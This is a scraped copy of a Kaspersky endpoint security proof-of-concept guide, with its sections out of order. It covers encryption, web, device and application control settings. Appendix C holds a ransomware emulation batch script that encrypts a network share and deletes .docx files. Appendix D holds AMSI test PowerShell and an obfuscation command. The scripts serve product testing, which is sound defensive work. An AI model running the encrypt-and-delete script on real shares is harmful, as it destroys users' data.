Congratulations! You have encrypted the hard drives with Kaspersky encryption technology.

USB File Level Encryption with portable file manager
Kaspersky Endpoint Security allows to secure sensitive data with file level encryption technology in case the data is
transferred on a removable drives. This scenario shows how to configure USB File Level Encryption with portable
file manager in order to ensure that sensitive data on the removable drive can be accessed only by authorized
person.
Evaluation steps:

2. Copy example file to a removable drive.
3. Connect the removable drive to another computer and try to access the data.
4. Run portable file manager and access the encrypted data.
Expected results:
Data can be accessed only with authorization via portable file manager.
Instructions:
1. Open KES 11 policy properties and switch to

Encryption of removable drives section.
Set the Encryption mode to Encrypt new files

only and enable Portable mode.
2. After the policy will be applied when a user

connects a USB drive to the computer he sees
the following dialog.
If he chooses Do not encrypt files option then

the drive will be available only for reading.
To be able to write to the disk a user have to

select Encrypt files option.

3. After that a user will be asked to create a

password for the portable file manager.
4. When the password is set it is allowed to write to

the usb drive.
5. Create a text file (New file.txt in this example)

and copy it to the usb drive.
The file will be encrypted right after it is copied to

the drive.
Connect the usb drive to a computer without

KES and try to open newly encrypted file. You
will see that the file is encrypted, and a content
is unreadable.
6. Now launch the portable file manager (pmv.exe)

and enter the password.

7. With the portable file manager you will access

the file.
You have configured the encryption policy to encrypt only files that will be added to a usb drive after applying the
policy. The files can be accessed with portable file manager.
BitLocker management
KES 11 offers the BitLocker management capability in order to provide more flexible tools for drive encryption. This
scenario shows how to configure full drive encryption feature using BitLocker Drive Encryption technology.
Evaluation steps:

2. Wait until the encryption process completes.
Expected results:
A hard drive is encrypted with BitLocker Drive Encryption technology.
Instructions:
1. Open KES 11 policy properties in KSC and

switch to Full Disk Encryption section.
Select BitLocker Drive Encryption as

encryption technology and change the
encryption mode to Encrypt all hard drives.

2. Right after policy will be applied, a user will be

asked to set a password.
3. The drive encryption will start after the system

reboot.
4. During the system reboot a user will be asked for

the password in the BitLocker pre-boot
authentication.
5. When the system is rebooted you can check the

encryption status in the computer’s properties.
To do that double click on the device to open its

properties.
Switch to Applications section. Select

Kaspersky Endpoint Security for Windows
application and click Statistics button.

6. Scroll down to check the encryption status
7. The encryption process goes in background and

is fully transparent to a user.
Congratulations! You have encrypted the hard drives with BitLocker Drive Encryption technology.
Desktop controls
Web control
Many companies are concerned about Internet traffic consumption. When analyzing the company Internet traffic,
security administrators may want to deny users to visit social networks.
It is possible with Web control available in KES 11 application. In this evaluation scenario, we will configure blocking
access to social networks for all users.
Evaluation steps:
1. Configure and apply the policy

2. Access restricted web-resource from the user’s computer.
Expected results:
The access to a specified site is restricted.
Instructions:

1. Open KES11 policy properties and switch to the

Web Control section.
Click Add button to add a new rule.
2. Specify the rule parameters.
Name: Social Networks
Filter content: By content categories
Content category: Internet communication

media
Users and groups: Everyone
Action: Block
Save the rule and apply the policy.
3. Try to access vk.com or facebook.com from a

protected machine.
You will get the Access Denied banner.

Congratulations! You have configured the Web Control feature to block the access to social networks.
Device control
This scenario shows the capability of device control component and how to deny the use of unwanted removable
drives.
Evaluation steps:
1. Configure policy to restrict USB devices connection.

2. Connect USB drive to a protected system.
3. Review event log.
Expected results:
The use of USB drive is blocked by device control.
Instructions:
1. Open KES 11 policy properties and switch to

Device Control section
2. In the Device Control Settings area select

Removable drives from the list.
Change the Access value to Block.

3. Try to connect USB drive to a protected system.

The use of a removable drive will be blocked and
you will the following notification.
4. Review the event in KSC.
5. Details.
You have configured Device Control feature to block the use of unwanted removable drives.
Application startup control
This scenario demonstrate how Application startup control can blocks the launch of untrusted programs. In this
scenario you will configure default deny policy with minimum set of applications allowed to start. Then you will add
the Internet browsers to the whitelist.
Evaluation steps:

1. Configure policy to enable default deny (whitelisting).

2. Check if the startup of the application that is not in the list (internet explorer) is blocked.
3. Create a category for allowed applications.
4. Add application category to the whitelist.
5. Check if the application startup is blocked.
Expected results:
The launch of the application that is not in the whitelist is blocked. After adding the application to the whitelist the
launch of the application is allowed.
Instructions:
1. Open the KES 11 policy and switch to the

Application control section.
Change the Application Control mode to

White list.
Ensure that Golden Image rule status is On.
2. Try to launch Chrome web browser on a

protected computer.
You will get the following error…
3. … and the following Notification from KES11.
4. In the KSC expand Advanced section then

Application Management section and open
Application categories section.
Click Create a category… button.

5. Select the first type of category (Category with

content added manually).
6. Define the name of the category.
7. Click Add button and select KL category option

from the menu.

8. Select Browsers group and close the dialog

windows by clicking OK.
9. Now you have added a condition to include

applications to the category.
Proceed to next step.

10. Here you can add conditions to exclude

applications from category if necessary.
Proceed to next step.
11. Finish the category creation wizard.
12. Click Add button to add just created category to

the whitelist.

13. Select your category from drop-down list. In this

case the category is Browsers.
Leave other settings by default and proceed to

the next step.
14. Now you can close the policy properties window

and start the Internet browsers on the protected
devices.
Congratulations! You have configured application Startup Control Default Deny policy and added additional
applications (the Internet browsers) to the whitelist.

Conclusion
This concludes your evaluation of the Endpoint Security. This simplified guide is intended for a quick evaluation of
the product features, using a narrow scope of work. It does not replace the Product Documentation and detailed
Deployment Guides (see Further reading section). Through this process, you have learned how to install Endpoint
Security products and demonstrate most interesting features.

Appendix A: POC success criteria

# Task Success criteria Notes
1. Prepare environment
1.1 Review the requirements POC environments meets all the imposed
requirements
1.2 Configure network All required network ports are open in the
right direction
1.3 Check accounts rights and POC is performed through the accounts
permissions having sufficient privileges
2. Setup and deploy
2.1 Install Kaspersky Security Center Kaspersky Security Center Administration

10 server and administration console are
installed
2.1.1 Install Network Agent for Windows Network Agents are installed on the target
devices
2.1.2 Install Network Agent for Linux Network Agents are installed on the target
devices
2.2 Install Kaspersky Endpoint Security KES 11 for Windows is installed on the
11 for Windows target devices
2.3 Install Kaspersky Endpoint Security KES 10 for Linux is installed on the target
10 for Linux devices
2.4 Install Kaspersky Security 10 for KSWS 10 is installed on the target devices
Windows
3. Antimalware protection for Windows workstations
3.1 Malware advanced detection PowerShell script execution is prevented.

(AMSI)
3.2 Exploit prevention testing Vulnerability exploitation is prevented
3.3 Web threats protection Malicious URL is detected. Web access to

the malicious URL is blocked
3.4 Anti-Bridging testing The use of an alternative network interface is

denied
3.5 Network Threats Protection The network port scanning is detected
4. Antimalware protection for servers
4.1 Anti-ransomware testing Ransomware attack on a network share is

prevented

4.2 KSWS ICAP-integration with proxy EICAR test virus file download is blocked
server
4.3 Linux servers protection EICAR test virus file is detected
5. Data protection for workstations and laptops
5.1 Full Drive Encryption A Hard drive is encrypted with Kaspersky

encryption technology
5.2 USB File Level Encryption with Files on a USB flash drive are encrypted and
portable mode can be accessed only with portable file
manager
5.3 BitLocker management A Hard drive is encrypted with BitLocker

technology
6. Workstation controls
6.1 Web control The access to the specific web resources is

denied
6.2 Device control The use of removable drives is denied
6.3 Application startup control Default Deny policy applied, application

added to whitelist can be launched

Appendix B: Further Reading

Support web site: https://support.kaspersky.com/ksc10
Administrator guide: https://docs.s.kaspersky-labs.com/english/kasp10.0_sc_admguideen.pdf
Best practices: https://docs.s.kaspersky-labs.com/english/kasp10_best_practicesen.pdf
Getting started: https://docs.s.kaspersky-labs.com/english/kasp10.0_sc_gsen.pdf
Implementation guide: https://docs.s.kaspersky-labs.com/english/kasp10.0_sc_implguideen.pdf
KSC 10 SP3 What’s new:

https://box.kaspersky.com/d/4a212ceb6073480aa124/files/?p=/KSC_10_SP3_Whats_new.pdf
Kaspersky Endpoint Security 11 (beta)
KES11 what’s new: https://box.kaspersky.com/d/4a212ceb6073480aa124/
Online help: https://help.kaspersky.com/KESWin/11/en-US/127968.htm
Support web site: https://support.kaspersky.com/ksws10
Administrator guide: https://docs.s.kaspersky-labs.com/english/ks4ws_admin_guide_en.pdf
Installation guide: https://docs.s.kaspersky-labs.com/english/ks4ws_install_guide_en.pdf
Support web site: https://support.kaspersky.com/kes10linux
Administrator guide: https://docs.s.kaspersky-labs.com/english/kes10_linux_adminguide_en.pdf

Appendix C: Ransomware emulation script

@echo off
if exist C:\AESCrypt\aescrypt.exe goto :Step1
echo **** not exist C:\AESCrypt\aescrypt.exe ****
pause
exit
:Step1
if exist Z:\ goto :Step2
echo **** not exist \\ksc.testlab.local\share ****
pause
exit
:Step2
C:\AESCrypt\aescrypt.exe -e -p root Z:\*.*
if exist Z:\EULA.txt.aes goto :Step3
:Step3
del Z:\*.docx
echo **** Congratulations!!! Files are encrypted ****
pause
exit

Appendix D: AMSI demonstration scripts

bsstest_amsi.ps1:
Get-Host | Select-Object Version | Write-Host
Try
{
# Check invoke-expression works normally
$text = iex 'return "#KLBssBlockMeAmsi#"'
# Check invoke-expression delivered to bases (via BssTest rules)
iex "#KLBssTestDynamicScriptAmsi#"
}
Catch
{
# First invoke failed?
# Log exeception
Write-Host $_
# Return error code
Write-Host "Test failed"
exit 1
}
Try
{
# this should be blocked from bases (receiving part)
iex "#KLBssBlockMeBasesAmsi#"
exit 2
}
Catch
{
# Log exception
Write-Host $_
}
Try
{
# this should be blocked from bases (KDB scan)
iex "#KLBssBlockMeBasesKdbAmsi#"
exit 3
}
Catch
{
# Log exception
Write-Host $_
}
# Test succeeded - return special code

Write-Host "Test succeded"
exit 5555
obfuscate_bsstest_amsi:
Import-Module ./Invoke-Obfuscation.psd1
Out-ObfuscatedStringCommand -Path bsstest_amsi.ps1 -ObfuscationLevel 3 > bsstest_amsi_obf.ps1

Endpoint Security PoC Guide PDF

Uploaded by

Copyright:

Available Formats

You might also like

Endpoint Security PoC Guide PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Endpoint Security PoC Guide PDF

Uploaded by

Copyright:

Available Formats

Kaspersky Enterprise Cybersecurity

Kaspersky Enterprise Cybersecurity

Endpoint Security Proof of Concept Guide Page 2 of 78

It is assumed that reader will:

1. Possess experience in a system administration or technical reviewer role;

What is Endpoint Security?

Endpoint Security Proof of Concept Guide Page 3 of 78

What are the components of Endpoint Security?

 Management Agent Laptop Endpoint Security

Network Endpoint Security

Agent Windows Server / Security for

Figure 1. Endpoint Security components

Kaspersky Security Center

The components of KSC are:

Endpoint Security Proof of Concept Guide Page 4 of 78

Kaspersky Endpoint Security 11 for Windows

The following features are implemented in the application:

 Incident response tools

 Incident investigation capabilities

 NEW! Shared folders protection from remote encryption.

 NEW! Application control improvements:

 Mixed mode (test mode with blocking rules)

 New KL category – Trusted certificates

 NEW! Device control improvements:

 Anti-Bridging (blocks unauthorized commuting between networks)

 NEW! Simplified next-gen GUI interface and various UX improvements.

Endpoint Security Proof of Concept Guide Page 5 of 78

Kaspersky Security 10 for Windows Servers

You can install KSWS on the following servers:

The application includes the following components:

 Real-Time Protection. KSWS scans objects when they are accessed.

The following functions are implemented in the application:

Endpoint Security Proof of Concept Guide Page 6 of 78

Kaspersky Endpoint Security 10 for Linux

The application allows to:

 Scan boot sectors using the boot sector scan task.

 Scan process memory using the process memory scan task.

Endpoint Security Proof of Concept Guide Page 7 of 78

 Manage KESL using the following methods:

Prepare the environment

Table 1. Endpoint Security hardware requirements

Kaspersky Kaspersky Endpoint Kaspersky Security 10 Kaspersky Endpoint Network

CPU, GHz 1,4 TBA 2,4 X 4 core 1,86 1,4

RAM, GB 4 TBA 2 2 0,5

Kaspersky Endpoint Security 10 for Linux requires swap partition to be at least 1 GB

Kaspersky Security Center 10

Endpoint Security Proof of Concept Guide Page 8 of 78

Kaspersky Endpoint Security 11 for Windows

Kaspersky Security 10 for Windows Server

System requirements: https://support.kaspersky.com/kes10wks#requirements

Kaspersky Endpoint Security 10 for Linux

Download required files

Application distributive (beta): ksc_10sp3_10.5.1529_full_en.exe

Alternative location with additional info (KL forum): https://forum.kaspersky.com/index.php?/topic/379114-general-

Kaspersky Endpoint Security 11 for Windows

KES 11 installer (AES256 encryption, beta)

Alternative location with additional info (KL forum): https://forum.kaspersky.com/index.php?/topic/379106-general-

Kaspersky Security 10 for Windows Server